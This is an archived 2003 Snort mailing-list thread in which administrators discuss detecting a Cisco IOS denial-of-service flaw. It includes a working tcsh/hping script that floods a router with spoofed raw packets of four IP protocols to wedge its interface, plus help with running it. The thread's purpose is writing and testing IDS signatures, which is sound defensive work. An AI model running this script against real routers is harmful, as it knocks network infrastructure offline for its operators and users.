Snort mailing list archives
RE: RE: Problem with test script for Cisco vulnerab ility
From: CMartin () infosol com
Date: Mon, 21 Jul 2003 12:54:27 -0700
I also changed the line: foreach protocol (53 55 77 103) to: foreach protocol ( 53 55 77 103 ) This fixed the problem with the script. Thanks Pat for the info! -----Original Message----- From: Donahue, Pat [mailto:PDonahue () acmicorp com] Sent: Monday, July 21, 2003 11:31 AM To: CMartin () infosol com Cc: Snort-users () lists sourceforge net Subject: [Snort-users] RE: Problem with test script for Cisco vulnerability You'll need to download hping at http://www.hping.org. /usr/local/sbin is where my FreeBSD ports install put the program. As for script, it's written with tcsh not sh syntax; just chmod u+x the file and run it like ./exploit.sh. Or, if you prefer just change "sh exploit.sh" to "tcsh exploit.sh" and that should work. -----Original Message----- From: CMartin () infosol com [mailto:CMartin () infosol com] Sent: Monday, July 21, 2003 2:27 PM To: Donahue, Pat Cc: Snort-users () lists sourceforge net Subject: Problem with test script for Cisco vulnerability I tried to implement this script to test my snort rules; however, it appears that I don't have hping in my /usr/local/sbin directory or not in my /sbin directory. I am running redhat v9. Also I get the following error when I try to run the script (sh exploit.sh). exploit.sh: line 8: syntax error near unexpected token `(' exploit.sh: line 8: `foreach protocol (53 55 77 103)' I'm wondering if the foreach is contructed properly. As for the hping, I'm sure I will find the program somewhere online. But also an interesting note, my whole /usr/local/sbin is empty. Can anyone help? -----Original Message----- From: Donahue, Pat [mailto:PDonahue () acmicorp com] Sent: Monday, July 21, 2003 6:44 AM To: Eric Hines; Michael Scheidell; Compton, Rich Cc: snort-sigs () lists sourceforge net; Snort-users () lists sourceforge net Subject: RE: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS Vulnerability Here's a simple script I wrote that you can use to generate an attack:
cat exploit.sh
#!/bin/tcsh -f if ($1 == "" || $2 == "") then echo "usage: $0 <router hostname|address> <ttl>" exit endif foreach protocol (53 55 77 103) /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26 end As you can see, this script iterates over the various protocols and sends 19 packets each for a total of 76 (just enough to fill up the input queue on vulnerable routers). Before upgrading my routers, I confirmed that this attack works. I then tested to see if sending 76 packets of a single protocol was enough to hose the interface.. it was. Maybe I mis-read the original advisory, but it seemed to me that Cisco suggested all 4 were necessary. Therefore, be careful when creating your signatures.. If you don't use any of the above protocols (SWIPE, IP Mobility, Sun ND, PIM) it might make sense to have rules that log/alert on all of them. Don't make the rules too dependent on the payload either; in several packet captures I've seen, the payload is significantly larger than the 26 bytes necessary to exploit IOS. -- Patrick Donahue Network/Systems Administrator ACMI Corporation -----Original Message----- From: Eric Hines [mailto:loki () fatelabs com] Sent: Friday, July 18, 2003 8:02 PM To: 'Michael Scheidell'; 'Compton, Rich' Cc: snort-sigs () lists sourceforge net; Snort-users () lists sourceforge net Subject: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS Vulnerability There is definitely an exploit out.. I've got it.. Those of you who would like to generate a Snort signature from it can get the exploit off the Full-Disclosure mailing list. Regards, Eric Hines CEO, Chairman =============================================== Eric Hines CEO, Chairman Applied Watch Technologies, Inc. eric.hines () appliedwatch com ----------------------------------------------- Corporate Headquarters 1650 Carlemont Dr. Suite D Crystal Lake, IL. 60014 ----------------------------------------------- Direct Toll Free: (877) 262-7593 (x327) Fax: (815) 425-2173 ----------------------------------------------- Main Switchboard: (877) 262-7593 (9am-5pm CST) Commercial Sales: (877) 262-7593 (opt1) Government Sales: (877) 262-7593 (opt2) =============================================== -----Original Message----- From: Michael Scheidell [mailto:scheidell () secnap net] Sent: Friday, July 18, 2003 9:01 AM To: Compton, Rich Cc: 'snort-sigs () lists sourceforge net'; Snort-users () lists sourceforge net Subject: Re: [Snort-sigs] Suggested Sig for Cisco DOS Vulnerability
Hey guys, Doesn't look like a exploit exists as of yet but Cisco just released
what IP
protocols cause the DOS so it won't be long until there is one!
from http://www.theregister.co.uk/content/55/31825.html someone sent shadowchode.tar.gz to [Full-Disclosure] list. Cisco IOS DoS exploit released in the wild By John Leyden Posted: 18/07/2003 at 12:01 GMT The risk posed by a serious DoS vulnerability to a wide range of Cisco Systems routers and switches has been upgraded following the release of an exploit onto a full disclosure mailing list. ------------------------------------------------------- This SF.net email is sponsored by: VM Ware With VMware you can run multiple operating systems on a single machine. WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the same time. Free trial click here: http://www.vmware.com/wl/offer/345/0 _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs ------------------------------------------------------- This SF.net email is sponsored by: VM Ware With VMware you can run multiple operating systems on a single machine. WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the same time. Free trial click here: http://www.vmware.com/wl/offer/345/0 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users ------------------------------------------------------- This SF.net email is sponsored by: VM Ware With VMware you can run multiple operating systems on a single machine. WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the same time. Free trial click here: http://www.vmware.com/wl/offer/345/0 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users ------------------------------------------------------- This SF.net email is sponsored by: VM Ware With VMware you can run multiple operating systems on a single machine. WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the same time. Free trial click here: http://www.vmware.com/wl/offer/345/0 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users ------------------------------------------------------- This SF.net email is sponsored by: VM Ware With VMware you can run multiple operating systems on a single machine. WITHOUT REBOOTING! Mix Linux / Windows / Novell virtual machines at the same time. Free trial click here: http://www.vmware.com/wl/offer/345/0 _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- RE: RE: Problem with test script for Cisco vulnerab ility CMartin (Jul 21)